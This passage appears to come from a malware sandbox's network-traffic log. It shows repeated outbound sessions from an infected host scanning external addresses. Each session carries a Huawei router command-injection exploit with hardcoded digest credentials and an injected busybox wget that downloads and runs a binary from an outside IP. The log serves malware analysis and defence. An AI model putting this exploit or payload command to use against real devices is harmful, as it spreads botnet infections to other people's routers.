                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              996192.168.2.155198231.136.155.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928196907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              997192.168.2.153734441.24.211.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928216934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              998192.168.2.1545040181.42.202.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928232908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              999192.168.2.1534094102.214.107.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928271055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1000192.168.2.154727694.201.18.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928271055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1001192.168.2.155212694.66.53.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928294897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1002192.168.2.1541054181.16.213.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928308964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1003192.168.2.1559090121.24.173.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928323030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1004192.168.2.1557088157.32.116.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928364992 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1005192.168.2.1558228138.234.69.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928365946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
